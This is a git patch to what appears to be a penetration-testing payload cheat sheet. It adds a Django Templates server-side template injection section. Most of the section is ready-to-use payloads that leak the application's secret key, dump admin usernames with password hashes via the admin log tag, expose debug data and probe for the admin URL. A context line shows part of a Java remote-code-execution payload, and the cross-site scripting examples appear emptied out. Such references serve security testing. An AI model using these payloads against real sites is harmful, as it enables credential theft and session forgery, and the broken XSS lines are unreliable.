From 871b3bcaf2623a097b79d7d246d10eb1cba6c23e Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Tue, 30 Aug 2022 13:50:03 +0200 Subject: [PATCH] Add Django Templates SSTI --- Server Side Template Injection/README.md | 54 ++++++++++++++++++++++++ 1 file changed, 54 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 797af48..4bb1228 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -33,6 +33,7 @@ - [Java - Basic injection](#java---basic-injection) - [Java - Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables) - [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd) + - [Django Template](#django-template) - [Jinja2](#jinja2) - [Jinja2 - Basic injection](#jinja2---basic-injection) - [Jinja2 - Template format](#jinja2---template-format) @@ -337,6 +338,58 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex --- +## Django Templates + +Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2. + +### Django Templates for post-exploitation + +```python +# Variables +{{ variable }} +{{ variable.attr }} + +# Filters +{{ value|length }} + +# Tags +{% csrf_token %} +``` + +### Cross-site scripting + +```python +{{ '' }} +{{ '' | safe }} +``` + +### Debug information leak + +```python +{% debug %} +``` + +### Leaking app’s Secret Key + +```python +{{ messages.storages.0.signer.key }} +``` + +### Admin Site URL leak + + +``` +{% include 'admin/base.html' %} +``` + +### Admin username and password hash leak + + +``` +{% load log %}{% get_admin_log 10 as log %}{% for e in log %} +{{e.user.get_username}} : {{e.user.password}}{% endfor %} +``` + ## Jinja2 [Official website](https://jinja.palletsprojects.com/) @@ -893,3 +946,4 @@ $str.valueOf($chr.toChars($out.read())) * [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) * [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) +* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)